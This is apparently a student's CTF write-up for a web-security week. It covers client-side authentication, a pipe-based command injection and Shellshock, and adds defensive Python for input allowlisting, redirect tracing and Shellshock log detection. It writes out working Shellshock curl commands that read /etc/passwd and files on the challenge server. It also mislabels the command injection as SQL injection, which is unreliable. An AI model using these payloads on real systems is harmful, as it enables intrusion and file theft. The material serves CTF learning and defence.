RITSEC Fall 2018 CTF — Week 6

The sixth week of RITSEC’s Fall 2018 CTF has concluded. I post detailed write-ups here each week for the challenges I am able to solve. I do this because as a freshman, when I read challenge write-ups they often went step-by-step but never elaborated on why a certain command was run or the strategy the author followed when solving the challenge. This is my effort to elaborate on the reasoning behind the process. As always, let me know of any errors. RITSEC’s tech lead can also walk anyone through solving any of the expired flags if necessary.

Topic

This week is “Intro to Web”, which explores the developer console, input handling, web application vulnerabilities, and other topics. Points are earned by finding flags, either by locating a disguised object or element or by exploiting a particular weakness in the way a challenge was built. All challenges are located on a subdomain of ritsec.club this week.

Easy 1 — Give me the answer!

The challenge submission form is (temporarily, until the website is fixed) a Google Form. The text field to input the flag for Easy 1 has response validation applied to it, meaning that the input must conform to a specified regular expression or a custom error message will be displayed. In this case, click the text field and enter any input.


Because the data entered doesn’t conform to the requirements, the custom error message is shown, and in this case that message contains the flag itself, so any input that doesn’t match the flag reveals it. The flag is RS{s3cr3t_an5w3r}.

Easy 2 — What’s the password?
Challenge link: web1.ritsec.club


The link presents the viewer with a login page for “a mini-ctf for you all to play”. Open the developer console in a web browser and view the source of the page.


There is nothing interesting about the HTML file in itself, but it does link to a JavaScript file web1.ritsec.club/js/login.js. Open the file by navigating to it or by opening it in the Sources tab of the developer console.


This file is very interesting, because it follows the very bad practice known as client-side authentication, which lets anyone viewing the web page see the criteria necessary to log in. In addition, the username and password values are written as hex-escaped characters. This is reminiscent of a previous challenge. Stripping the \x from the username and password values with the find-and-replace feature of a text editor gives:

username: 61 64 6d 69 6e
password: 52 53 7b 63 6c 31 65 6e 74 5f 73 31 64 33 5f 61 75 74 68 7d

Converting these fields from hexadecimal to ASCII text gives:

username: admin
password: RS{cl1ent_s1d3_auth}

The flag is RS{cl1ent_s1d3_auth}. The username and password can now be used to login, if desired.
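The find-and-replace step above can be done in a few lines of code, which is handy when a script hides more than two literals. The following is an added example, not code from the write-up or the challenge; the variable names u and p in the sample source are assumptions, but the byte values are the ones listed above.

```python
import re

# Constructed sample in the shape of the hex-escaped literals found in login.js.
# The names u and p are assumptions; the byte values are those from the write-up.
SAMPLE_JS = r'''
var u = "\x61\x64\x6d\x69\x6e";
var p = "\x52\x53\x7b\x63\x6c\x31\x65\x6e\x74\x5f\x73\x31\x64\x33\x5f\x61\x75\x74\x68\x7d";
'''

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_js_hex_literal(literal: str) -> str:
    """Turn a JS string body such as '\\x61\\x64' into text, leaving plain characters alone."""
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def extract_string_literals(js_source: str) -> dict:
    """Map each `var name = "..."` assignment in the source to its decoded value.

    Anything a page sends to the browser, escaped or not, is readable by the
    visitor, which is why a check like this cannot act as authentication.
    """
    pattern = re.compile(r'var\s+(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"')
    return {name: decode_js_hex_literal(body) for name, body in pattern.findall(js_source)}


if __name__ == "__main__":
    for name, value in extract_string_literals(SAMPLE_JS).items():
        print(f"{name}: {value}")
```

Running it prints the decoded username and password; the same function works on any escaped literal the browser has already been handed.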


Medium 1 — It’s not always SQL you know!
Challenge link: web2.ritsec.club


Browsing to the link gives a page with a single text field. By inspecting the text field and button using the developer console, it can be seen that this field is sending a POST request to the server. Run the suggested ps command.


This returned the results of the ps command, but the flags ax were appended to it before it was run, which means the command displays processes for all users and processes not running in a terminal. It also appended a grep command for the term that was entered. Next, try entering various escape characters to see if any undesired operation can be caused. This is an SQL injection, and is usually caused by improper input handling, such as not restricting escape characters or another oversight that would let a user execute arbitrary code. Try using a command such as ps ; grep -r "RS{" to see if it returns the flag.

Nothing is returned. This may indicate that the semicolon (;) is being filtered on the server side. Try a different escape character, the pipe (|), in place of the semicolon in the same argument as above.


The flag is RS{S3mI_ColoN5_t0o_8ORin9}.
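The lesson of this challenge is that filtering one metacharacter is not input handling. Below is an added example (not the challenge’s server code, whose real shape is not on the page) that contrasts the injectable pattern, a semicolon-only blocklist, and a hardened search that allowlists the term and runs grep without a shell at all.

```python
import re
import subprocess

# Constructed stand-in for the output the challenge's `ps ax` produced.
SAMPLE_PS_OUTPUT = """\
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:00 /sbin/init
  412 ?        Ss     0:00 /usr/sbin/apache2 -k start
  418 pts/0    S      0:00 /bin/bash
"""


def vulnerable_command(term: str) -> str:
    """Assumed shape of an injectable back end: user input spliced into a shell string."""
    return f"ps ax | grep {term}"


def semicolon_filter(term: str) -> str:
    """The kind of blocklist the challenge appeared to use: strips ';' and nothing else,
    so '|', '&&', backticks and '$( )' still reach the shell intact."""
    return term.replace(";", "")


_SAFE_TERM = re.compile(r"^[A-Za-z0-9_./:-]{1,64}$")


def term_is_allowed(term: str) -> bool:
    """Allowlist: only characters a process name can legitimately contain."""
    return _SAFE_TERM.match(term) is not None


def run_search(term: str, ps_output: str = SAMPLE_PS_OUTPUT) -> list:
    """Hardened version: validate, then pass the term as a single argv element.

    With an argument list and no shell, grep receives the term verbatim; a '|'
    inside it is just a character to match, never a pipe. -F treats the term as
    a fixed string and -- marks the end of options, so a term starting with '-'
    cannot be misread as a grep flag.
    """
    if not term_is_allowed(term):
        raise ValueError("search term contains characters outside the allowlist")
    result = subprocess.run(
        ["grep", "-F", "--", term],
        input=ps_output, capture_output=True, text=True, check=False,
    )
    return result.stdout.splitlines()


def demo():
    payload = "x | grep -r RS{"   # the style of input the write-up used
    print("after ; filter  :", vulnerable_command(semicolon_filter("x ; id")))
    print("pipe survives   :", vulnerable_command(semicolon_filter(payload)))
    print("hardened 'bash' :", run_search("bash"))
    print("payload allowed?:", term_is_allowed(payload))


if __name__ == "__main__":
    demo()
```

The point of the hardened function is not the regex alone: even if the allowlist were too generous, the argument-list call leaves no shell to interpret what the user typed.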

Medium 2 — What’s even happening?
Challenge link: web3.ritsec.club
Flag is not in “RS{}” format.

Open the provided link. The browser immediately starts redirecting in an infinite loop. Close the tab, open the developer console, and select the Network tab. Check “preserve log”, clear any content that may have already accumulated, and browse to the link. (Features vary by browser, so this process may be slightly different; for reference, I am using Chrome.)


The redirects appear to start with web3.ritsec.club/M.html, so stop the page from loading as soon as that URL appears a second time. The list of redirects is now collected. Inspect the names of the web pages: discarding anomalies such as animal names and the index, and combining the remaining page names into one word, gives M4nyR3d1rects2. The flag is RS{M4nyR3d1rects2}.
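The Network tab is one way to capture a redirect chain; a short client that follows one hop at a time and stops at the first repeated URL is another, and it does not depend on stopping the page by hand. The following is an added example, not the challenge’s site or the write-up’s code: it runs a local server with a constructed redirect table (only M.html is named on the page; the other page names are assumptions chosen to spell the flag) and walks the chain with loop detection.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed redirect table standing in for the challenge site. Only M.html
# appears in the write-up; the other names are assumptions that spell the flag,
# with "noise" pages mixed in the way the challenge mixed in animal names.
REDIRECTS = {
    "/": "/M.html",
    "/M.html": "/4.html",
    "/4.html": "/cat.html",
    "/cat.html": "/ny.html",
    "/ny.html": "/R3.html",
    "/R3.html": "/index.html",
    "/index.html": "/d1rects.html",
    "/d1rects.html": "/dog.html",
    "/dog.html": "/2.html",
    "/2.html": "/M.html",          # back to the start: the browser never settles
}
NOISE_PAGES = {"cat.html", "dog.html", "index.html"}


class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        target = REDIRECTS.get(self.path)
        if target is None:
            self.send_error(404)
            return
        self.send_response(302)
        self.send_header("Location", target)
        self.end_headers()

    def log_message(self, *args):  # keep the demo output clean
        pass


def start_server():
    server = ThreadingHTTPServer(("127.0.0.1", 0), RedirectHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def follow_redirects(host, port, start="/", max_hops=50):
    """Walk 3xx responses one hop at a time, like the Network tab with 'preserve log'.

    Returns (chain, looped): the ordered Location values seen, and whether the walk
    ended because a URL repeated. max_hops bounds the walk even if no URL repeats.
    """
    chain, seen, path = [], set(), start
    for _ in range(max_hops):
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("GET", path)
        resp = conn.getresponse()
        resp.read()
        location = resp.getheader("Location")
        conn.close()
        if not (300 <= resp.status < 400 and location):
            break
        chain.append(location)
        if location in seen:
            return chain, True
        seen.add(location)
        path = location
    return chain, False


def assemble_flag(chain, noise=NOISE_PAGES):
    """Join page names in order, dropping noise pages, stopping where the chain repeats."""
    parts, seen = [], set()
    for url in chain:
        name = url.rsplit("/", 1)[-1]
        if name in seen:
            break
        seen.add(name)
        if name not in noise:
            parts.append(name[:-5] if name.endswith(".html") else name)
    return "".join(parts)


def demo():
    server = start_server()
    try:
        host, port = server.server_address
        chain, looped = follow_redirects(host, port)
        flag = assemble_flag(chain)
        print(f"hops: {len(chain)}  loop detected: {looped}  candidate: {flag}")
        return chain, looped, flag
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    demo()
```

The visited set is what turns an infinite redirect into a finite list; the hop cap is the second guard, for chains that rotate through many distinct URLs before repeating.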

Hard — Find that flag! Good luck!
Challenge link: web4.ritsec.club

Navigate to the challenge link. An interesting page is presented.


The stats portion of the webpage seems similar to Medium 1. Open the developer console to look at the source.


This page has content loaded from the cgi-bin directory on the web server. This directory is part of the Common Gateway Interface, an antiquated interface most notable for allowing exploitation of the Shellshock vulnerability discovered in September 2014. Shellshock allows arbitrary code execution when a website relying on CGI receives a request carrying a specially crafted User-Agent header. User agents identify the browser to the website so the website can be formatted properly. This is typically used to adjust between desktop and mobile views, or to determine if the client is running an outdated browser that may not render the website properly.

Occasionally a server will receive a request that must be handled by running a different program on the machine, known as a handler. When the server uses CGI to pass a request from a browser to a handler program such as bash, it sends environment variables (variables that get or set settings in processes) to the program as well. This is how the results of the stats program are being displayed on the challenge website, and where the Shellshock vulnerability comes into play.

All Shellshock exploits begin with some variant of () { :; }; being placed in the browser’s user agent (either by modifying the user agent within the browser through the developer console or a third-party add-on), or by sending a user agent with a request through another application, such as curl, a tool for client-side URL transfers. Open a terminal and input the following command, which will use curl to exploit the Shellshock vulnerability in the challenge website.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://web4.ritsec.club:80/cgi-bin/stats

The website is proven vulnerable to Shellshock! Being able to view the passwd file (and other files) on a publicly-facing web server is obviously a major security risk. A breakdown of the command that was run is as follows:

  • curl -H — Using curl, add a header with a specific message to the request
  • user-agent: — Set the user agent
  • () { :; }; — An example string of text that can be used to trigger the Shellshock vulnerability. There are many variants of this.
  • echo; echo; /bin/bash -c — Run a command directly on the bash interpreter
  • cat /etc/passwd — The command to run
  • \ http://web4.ritsec.club:80/cgi-bin/stats — The website to exploit (the backslash continues the command onto the next line)

Now that shell access is obtained, search for anything that might be a flag.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / | grep 'flag''" \
http://web4.ritsec.club:80/cgi-bin/stats

This text file looks interesting. Open it.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag_boy.txt'" \
http://web4.ritsec.club:80/cgi-bin/stats

The flag is RS{sh0cking1y_e4sy}.
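From the defender’s side, the mechanism described above (an environment variable that begins with a bash function definition) is also what makes Shellshock attempts easy to spot: every variant of the trigger carries the `() {` prefix, and on a CGI host it lands in the User-Agent field of the access log. The following is an added example, not from the write-up or the challenge: it scans constructed Apache combined-format log lines for that marker and, as a second check, runs the widely published harmless self-test against the local bash to see whether it is patched.

```python
import os
import re
import shutil
import subprocess

# Constructed Apache combined-format access log lines. Addresses are from the
# documentation ranges; the second User-Agent is the string used in the write-up.
SAMPLE_LOG = r'''
198.51.100.7 - - [07/Oct/2018:14:02:11 -0400] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/62.0"
203.0.113.9 - - [07/Oct/2018:14:03:40 -0400] "GET /cgi-bin/stats HTTP/1.1" 200 1842 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
203.0.113.9 - - [07/Oct/2018:14:03:58 -0400] "GET /index.html HTTP/1.1" 200 3201 "-" "curl/7.61.0"
198.51.100.22 - - [07/Oct/2018:14:05:02 -0400] "GET /cgi-bin/stats HTTP/1.1" 200 1842 "-" "() {:;}; /usr/bin/id"
'''

# ip, ident, user, [timestamp], "method path proto", status, size, "referer", "user-agent"
LOG_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "(.*)"$'
)
# The bash function-definition prefix every Shellshock variant must start with.
# Whitespace between "()" and "{" is optional, so match it loosely.
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{")


def find_shellshock_attempts(log_text: str) -> list:
    """Return one record per request whose User-Agent carries the Shellshock prefix."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, method, path, status, ua = m.groups()
        if SHELLSHOCK_MARKER.search(ua):
            hits.append({"ip": ip, "time": ts, "method": method, "path": path,
                         "status": int(status), "user_agent": ua})
    return hits


def local_bash_is_vulnerable():
    """Harmless self-test: a patched bash prints only 'test'; an unpatched one also
    executes the trailing echo from the environment variable. None if bash is absent."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = {"x": "() { :;}; echo VULNERABLE", "PATH": os.environ.get("PATH", "")}
    out = subprocess.run([bash, "-c", "echo test"], env=env,
                         capture_output=True, text=True).stdout
    return "VULNERABLE" in out


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['time']}  {hit['ip']:<15} {hit['path']}  status={hit['status']}")
    print("local bash vulnerable:", local_bash_is_vulnerable())
```

Matching on the function prefix rather than on any particular payload is deliberate: the commands after `};` vary from attacker to attacker, but the prefix cannot. Note that a 200 status on these lines says nothing about whether the injected command ran; only a patched bash, or not exposing CGI handlers at all, closes the hole.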

In conclusion

If there are any errors, please let me know. I am still very new to web application vulnerabilities.

Building an application that could be potentially accessed by anyone on the internet has its challenges, with only a minority of potential problems represented in this week’s demo. The need for safer web development is strong enough that RIT offers a class dedicated to this area, Principles of Web Application Security, which is usually taken as a required class in a Computing Security student’s third year.

However, there are many excellent opportunities to learn how to exploit and secure websites without taking a class. There are vulnerability scanners for web applications (such as Nikto and Burp Suite) and web browsers (such as BeEF), pentesting tools such as Metasploit, and a whole list of other tools on OWASP’s website. These tools, and more, come preinstalled on Kali Linux.

In addition, here are a few more articles discussing the Shellshock vulnerability and various exploitation techniques. Along with Heartbleed and CryptoLocker, the vulnerability was one of the most concerning of the year. Its use in this week’s challenges is a reminder that all vulnerabilities, even old ones, can still exist today and aren’t necessarily just historical context.

There will be 9 more weeks of challenges coming from RITSEC this semester! If you want to know more about RITSEC check out their website or attend a meeting if you’re on RIT’s campus — 12–4 PM in GOL-2410 for the CTF and presentations. Until next week!

Written by

DFIR, CTFs, disinformation, STEM education, and pretty much anything else that comes to mind. RIT Computing Security ’22. wyatttauber.com
